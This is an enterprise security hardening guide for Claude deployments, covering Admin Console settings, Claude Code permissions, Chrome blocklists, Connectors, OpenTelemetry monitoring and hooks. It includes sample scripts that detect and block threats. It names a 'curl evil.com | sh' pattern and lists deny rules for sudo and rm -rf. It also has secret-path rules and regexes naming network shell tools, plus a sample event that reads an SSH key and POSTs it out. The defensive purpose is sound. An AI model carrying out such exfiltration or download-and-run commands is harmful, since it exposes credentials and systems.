Claude Security for Organizations: A Practical Hardening Guide
How to configure Claude across Claude.ai, Desktop, Code, Cowork, Chrome, Connectors, Extensions, and Plugins — with the rationale behind each setting so you can adapt it to your organization.
As Claude moves from "interesting tool" to "embedded in daily workflows," the security questions shift from "is this AI safe?" to "how do we configure it like any other piece of enterprise software?" The answer is the same as for every powerful platform: least privilege, monitor everything, isolate what you can, and put humans in the loop where it matters. Most of the risk in a Claude deployment doesn't live in Claude itself — it lives in the third-party things Claude is allowed to reach.
Start with organizational hardening
These are the settings to configure first, in the Claude Admin Console. They affect everyone in your tenant and close the most common Shadow AI gaps.
Domain verification
Claim your corporate email domains through the Claude Admin Console. This automatically pulls any employee who signs up with a company email into your managed workspace — preventing personal Claude accounts from becoming the place where corporate data ends up. This is the single highest-leverage anti-Shadow-AI control available.
SSO enforcement
Enforce single sign-on for all users. This brings Claude into your existing identity perimeter, so offboarding, MFA, and conditional access policies apply automatically. Don't leave Google/Apple/magic-link login as a fallback for managed users.
Account switching → disabled
Disable account switching on corporate assets. This prevents users from logging into a personal Claude account on a managed device, bypassing every other control you've put in place.
Note: Account switching control is available on Enterprise plans only.
Zero data retention (Enterprise)
Enable zero data retention so conversations aren't stored on Anthropic's side beyond the session. For regulated industries this is usually mandatory; for everyone else it's still a sensible default.
Public Project → On
This permits sharing of projects within your organization but blocks sharing them outside — a clean balance between collaboration and data leakage prevention.
Location metadata
Allowing Claude to use coarse location metadata (city/region) to improve product experience is generally fine. On Teams and Enterprise plans the data isn't used to train models, so the trade-off is minor.
Fast Mode and Remote Control → disabled
Both expand the surface area of what Claude can do without close oversight, and neither has a strong enterprise use case that justifies the risk by default.
Cowork: the risk lives in what you connect
Cowork runs inside a sandboxed virtual machine isolated from your main OS. Within that VM, even if something goes wrong, the blast radius is limited. The actual risk doesn't come from Cowork — it comes from the Extensions and Connectors (MCP) you allow it to reach, which operate outside the sandbox into your real data, real browser sessions, and real SaaS accounts.
Settings to configure
| Setting | Value |
|---|---|
| Dispatch | Disabled |
| "Always allow for connected tools" | Off |
| Scheduled Tasks | Review & minimise |
Audit gap: Cowork session content is not captured in Audit Logs, the Compliance API, or Data Exports today. Conversation history sits locally on user machines. The OpenTelemetry section below is your only real telemetry source for Cowork.
Claude Code: terminal power, terminal-level risk
Claude Code runs in the terminal and inherits the user account's permissions. Treat it like any developer tool that can shell out: useful, fast, and dangerous if misconfigured.
Permission modes
| Setting | Value |
|---|---|
| Claude in the web | Disabled |
| Always Bypass permission | Disabled |
| Allow auto permission | Allowed, with documented expectations |
Network egress → Package Managers + internal repos only
This is the single most effective Claude Code hardening lever: it stops `curl evil.com | sh` patterns dead while leaving `npm install` and your internal Artifactory/Nexus working normally.
Denied commands
```
Bash(sudo:*)
Bash(su:*)
Bash(rm -rf*)
```
Always-ask paths
Force a permission prompt for reads of sensitive files. A read of ~/.ssh plus outbound network access is instant credential exfiltration.
```
Read(**/.env)
Read(**/.env.*)
Read(**/secrets/**)
Read(**/.ssh/**)
Read(**/credentials.*)
```
Claude in Chrome: high utility, high surface
Chrome integration operates outside the VM sandbox, in the user's real browser with real cookies. That's what makes it useful, and that's what makes it risky.
| Setting | Value |
|---|---|
| "Ask before Acting" | Mandatory |
| SaaS portals, email, password vaults, finance, HR domains | Blocklisted |
| Storage & mail domains (exfil risk) | Blocklisted |
Note: The domain blocklist does not support wildcards as of current testing. Plan your blocklist as an explicit list of fully-qualified domains and revisit it on a schedule.
Connectors (MCP): where most of the real risk lives
Connectors let Claude reach third-party applications and read — or write — data in them. Always apply least-privilege access.
DLP gap: Most DLP tools miss or under-monitor AI agent activity. When a Connector has Write or Edit permissions on Storage or Mail, you've effectively created a data exfiltration channel that may not appear in your existing DLP dashboards.
| Setting | Value |
|---|---|
| Write/Edit on Storage & Mail connectors | Avoid unless justified |
| Connector permission audit cadence | Quarterly minimum |
| managed-MCP (Claude Code CLI) | Allowlist only |
Scope note: managed-MCP applies to Claude Code CLI only, not Claude Desktop. For Desktop, control MCP through the Admin Console MDM settings.
Extensions
Extensions let Claude interact directly with apps, data, and tools on the user's machine. Review every Extension in the catalog and allow only those that map to a documented organisational need. Apply least-privilege access and periodic review, the same principle as for Connectors.
Plugins
A Plugin is a package containing Skills, MCP servers, agents, and hooks. The risk profile is whatever the bundled MCP servers, Extensions, and Connectors bring with them. Vet plugins by what they contain, not by the plugin abstraction itself.
Guardrails and monitoring
You cannot govern what you cannot see. Three telemetry layers are needed for a complete picture.
OpenTelemetry (OTEL) for Claude Code and Cowork
Claude Code exports user prompts, API requests, and tool results. The prompt.id attribute ties every event back to the single user prompt that triggered it — giving you full audit trails of any session.
Cowork OTel events cover: full text of user prompts, every tool and MCP invocation (server name, tool name, parameters, success/failure, execution time), file paths read or modified, skills and plugins invoked, human approval decisions, and API requests and errors.
User prompt content is included by default in Cowork OTel. If your policies prohibit logging prompt content into a SIEM, configure filtering/redaction at your collector. Tool parameters can also contain sensitive values — plan retention and access policies before enabling.
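As an added example (not code from this guide, Anthropic, or any collector vendor), a small detector that runs over OTel-style tool events once they are in your SIEM: it groups events by `prompt.id` and flags any prompt that read a sensitive file and then ran a network-capable shell command, the read-plus-egress pairing the Claude Code section warns about. The event field names (`tool`, `path`, `command`) and the sample events are constructed for illustration and are not the exact Claude Code or Cowork schema.

```python
import re
from collections import defaultdict

# Constructed sample of OTel-style tool events. The field names are an
# assumption for illustration, not the exact Claude Code / Cowork schema;
# the one property relied on is that each event carries the prompt.id that
# ties it back to the user prompt which triggered it.
SAMPLE_EVENTS = [
    {"prompt.id": "p1", "tool": "Read", "path": "/repo/src/app.py"},
    {"prompt.id": "p1", "tool": "Bash", "command": "pytest -q"},
    {"prompt.id": "p2", "tool": "Read", "path": "/home/dev/.ssh/id_ed25519"},
    {"prompt.id": "p2", "tool": "Bash", "command": "curl -X POST https://example.invalid/upload"},
    {"prompt.id": "p3", "tool": "Read", "path": "/repo/.env"},
    {"prompt.id": "p3", "tool": "Bash", "command": "npm test"},
]

# Same sensitive-path rule as the always-ask list in the Claude Code section.
SENSITIVE = re.compile(r"(^|/)(\.env(\.[^/]*)?|credentials\.[^/]+)(?=/|$)|(^|/)(secrets|\.ssh)/")
# Shell tools that can move data off the host.
NETWORK = re.compile(r"\b(curl|wget|nc|ssh|scp|rsync)\b")


def find_exfil_candidates(events):
    """Group events by prompt.id and return {prompt.id: (sensitive_path, command)}
    for every prompt that read a sensitive file and afterwards ran a
    network-capable shell command within the same prompt."""
    by_prompt = defaultdict(list)
    for ev in events:
        by_prompt[ev["prompt.id"]].append(ev)  # preserves emission order
    hits = {}
    for pid, evs in by_prompt.items():
        sensitive_path = None
        for ev in evs:
            if ev["tool"] == "Read" and SENSITIVE.search(ev.get("path", "")):
                sensitive_path = ev["path"]
            elif sensitive_path and ev["tool"] == "Bash" and NETWORK.search(ev.get("command", "")):
                hits[pid] = (sensitive_path, ev["command"])
                break
    return hits


if __name__ == "__main__":
    for pid, (path, cmd) in find_exfil_candidates(SAMPLE_EVENTS).items():
        print(f"ALERT prompt.id={pid}: read {path} then ran {cmd!r}")
```

Only p2 is flagged: p1 touches no secrets, and p3 reads `.env` but never reaches the network, which is the difference between a policy violation worth a prompt and one worth a page.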
Compliance API (Enterprise)
Real-time, programmatic access to audit logs across Claude usage. Logs admin activities (member changes, API keys, access settings, sign-ins) and resource activities (file creation, downloads, deletion). This is the control-plane audit log, not a conversation transcript. Enable it — the half-day integration cost is trivial compared to the audit-readiness value.
The complete monitoring picture
| Source | Plane |
|---|---|
| Compliance API | Control plane — admin activity & config changes |
| OpenTelemetry | Agent plane — what Code & Cowork actually did |
| Network / LLM gateway | Tool & exfiltration plane — egress monitoring |
Human in the loop
Require manual approval for any task or CLI-generated code before it is committed, even in Auto Mode. Auto Mode lets Claude execute lower-risk, repeatable actions without prompting each time, while still surfacing prompts for higher-risk operations. It's a productivity tool, not an autopilot — the developer is still accountable for everything that gets through, and your governance policies should reflect that explicitly.
Hooks (Claude Code CLI and Agent SDK)
Hooks let you enforce rules on what Claude can do, every time, no exceptions. They apply to Claude Code CLI and the Agent SDK only — not Claude Desktop.
| Hook | Purpose |
|---|---|
| PreToolUse | Intercept a tool call before it runs — allow, block, or modify it |
| PostToolUse | React after a tool runs — log, format, or validate the result |
| UserPromptSubmit | Inspect or block a user's prompt before Claude sees it |
| PermissionRequest | Auto-approve or auto-deny permission dialogs without human input |
| Stop | Trigger actions when Claude finishes — or force it to keep working |
| InstructionsLoaded | Audit which CLAUDE.md instruction files were loaded into a session |
Use PreToolUse for hard blocks on dangerous commands, UserPromptSubmit for prompt-content classification, and InstructionsLoaded for supply-chain visibility on which CLAUDE.md files were loaded into a session.
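As an added example (not code from this guide or from Anthropic), a PreToolUse hook in Python that turns the denied commands and always-ask paths listed earlier into hard blocks. It assumes the Claude Code hook contract of the event arriving as JSON on stdin with `tool_name` and `tool_input`, exit code 2 meaning "block and return stderr to Claude", and the `settings.json` registration shown in the trailing comment; the script path `/opt/hooks/guard.py` is a placeholder.

```python
"""PreToolUse hook: hard-block dangerous shell commands and secret-file reads.

Assumed hook contract: the event arrives as JSON on stdin with tool_name and
tool_input; exit code 2 blocks the call and returns stderr to Claude, 0 allows.
"""
import json
import re
import sys

# Mirrors the guide's denied commands (sudo, su, rm -rf) and the curl | sh pattern.
DENIED_COMMANDS = [
    re.compile(r"(^|[;&|]\s*)sudo\b"),
    re.compile(r"(^|[;&|]\s*)su\b"),
    re.compile(r"\brm\s+-\w*([rR]\w*f|f\w*[rR])"),
    re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z|da)?sh\b"),
]
# Mirrors the guide's always-ask paths, enforced here as hard blocks.
SENSITIVE_PATHS = re.compile(
    r"(^|/)(\.env(\.[^/]*)?|credentials\.[^/]+)(?=/|$)|(^|/)(secrets|\.ssh)/"
)


def evaluate(event: dict) -> tuple[bool, str]:
    """Return (allowed, reason) for one PreToolUse event."""
    tool = event.get("tool_name", "")
    tool_input = event.get("tool_input") or {}
    if tool == "Bash":
        cmd = tool_input.get("command", "")
        for pat in DENIED_COMMANDS:
            if pat.search(cmd):
                return False, f"blocked by policy: command matches {pat.pattern!r}"
    elif tool in ("Read", "Edit", "Write"):
        path = tool_input.get("file_path", "")
        if SENSITIVE_PATHS.search(path):
            return False, f"blocked by policy: {path} is a protected secrets path"
    return True, ""


def main() -> int:
    allowed, reason = evaluate(json.load(sys.stdin))
    if not allowed:
        print(reason, file=sys.stderr)
        return 2  # 2 = block the tool call; the reason is fed back to Claude
    return 0


# Register in settings.json (assumed format; matcher is a regex over tool names):
# "hooks": {"PreToolUse": [{"matcher": "Bash|Read|Edit|Write",
#            "hooks": [{"type": "command", "command": "python3 /opt/hooks/guard.py"}]}]}
if __name__ == "__main__":
    sys.exit(main())
```

Keep the hook script itself outside the repository and owned by root (or pushed by MDM), otherwise the agent can edit the rules it is being held to.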
Pushing settings via MDM
Claude Desktop settings can be enforced from the Organisation Admin Console. Claude Code CLI settings must be pushed via your MDM (Jamf, Intune, Kandji, SCCM) — don't rely on developers configuring this themselves.
MDM-distributable controls for Claude Desktop
| Control | Setting |
|---|---|
| Manage Auto Updates | Configure |
| Enable Desktop Extensions | Configure |
| Enable Extension Directory | Configure |
| Enable Local MCP Servers | Configure |
| Enable Claude Code for Desktop | Configure |
| Enable Secure VM Features (Cowork) | Configure |
| Require Signed Desktop Extensions | Enabled |
| Disabled Built-in Tools | Per policy |
| Managed MCP Servers | Allowlist via MDM |
Routines and Scheduled Tasks
Routines (Claude Code) and Scheduled Tasks (Cowork) both execute without a human watching. Review the inventory regularly, scope them tightly, and treat each one as a standing automation that needs the same review you'd give a cron job in production.
Quick reference: sane default configuration
| Setting | Value |
|---|---|
| Domain verification | Enabled |
| SSO enforcement | Enabled |
| Account switching | Disabled (Enterprise) |
| Zero data retention | Enabled (Enterprise) |
| Public Project | On — within-org only |
| Fast Mode & Remote Control | Disabled |
| Cowork Dispatch | Disabled |
| Cowork "always allow for connected tools" | Off |
| Claude in Chrome — Ask Before Acting | Mandatory |
| Claude Code web access | Disabled |
| Claude Code bypass permissions | Disabled |
| Network egress | Package managers + internal repos |
| Connectors — Storage/Mail Write | Avoid unless justified |
| managed-MCP | Allowlist only |
| Extensions | Reviewed · signed · minimal scope |
| Hooks (PreToolUse, UserPromptSubmit) | Enabled |
| OpenTelemetry → SIEM | Enabled |
| Compliance API | Enabled (Enterprise) |
| Human-in-the-loop on commits | Mandatory |
The thing to internalise is that Claude itself is not the primary risk — the risk surface is everything Claude touches on your behalf. Sandboxes are great for code execution, but they don't help when the agent is reading your inbox or writing to your shared drive through a Connector you over-permissioned.
Configure with least privilege. Monitor with OTEL + Compliance API + egress controls. Keep humans in the loop for anything that writes, sends, or commits. Revisit settings quarterly — both your environment and Claude's feature set will keep evolving.
That's the whole posture. Everything else is implementation detail.